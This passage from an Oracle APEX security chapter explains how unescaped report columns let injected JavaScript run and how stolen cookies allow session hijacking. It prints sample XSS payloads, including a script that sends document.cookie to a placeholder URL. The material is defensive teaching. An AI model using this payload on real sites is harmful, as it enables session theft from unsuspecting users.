Databases Reference
In-Depth Information
Figure 8-19.
Javascript run in a SQL report
If there is any possibility of data containing unintended Javascript, the column display should be a
type will not run the script. Generally this is Display as Text (escape special characters, does not save
state). APEX 4 greatly improved the wizards and page building features to guard against cross site
scripting. In virtually all cases the APEX 4 wizards choose item and report column types that escape the
data that is returned to the page. Developers still have the ability to change column types to send
unescaped data to the browser or to send the unescaped content of an item.
Javascript has access to everything about the browser page that contains it, including cookies, which
can be very dangerous. Given the URL of a page and the cookies associated with a page, it is easy to
hijack a user's session. That is, if a hacker obtains the URL of a page you are currently viewing, and the
cookies associated with that URL, the hacker can insert those cookies into his own browser, go to the
URL, and essentially “become” you. The utility Firesheep operates on unencrypted wi-fi networks by
sniffing cookies associated with Facebook and Twitter and inserting them into the Firesheep user's
browser, allowing the user to become any Facebook or Twitter user on that unencrypted wi-fi network.
The following Javasacript is far less dangerous. It will cause an alert with the cookie values:
<script>alert(document.cookie);</script>
The following Javascript, however, will redirect the browser to another URL, passing along the
values of all of the cookies:
<script> window.location = 'http://someurl/' + document.cookie;</script>
While APEX does its best to keep us out of trouble, it is still possible to send unescaped content to
the browser. Consider the regions shown in Figures 8-20 and 8-21. In most cases, the two regions have
results, as shown in Figures 8-20 and 8-21.
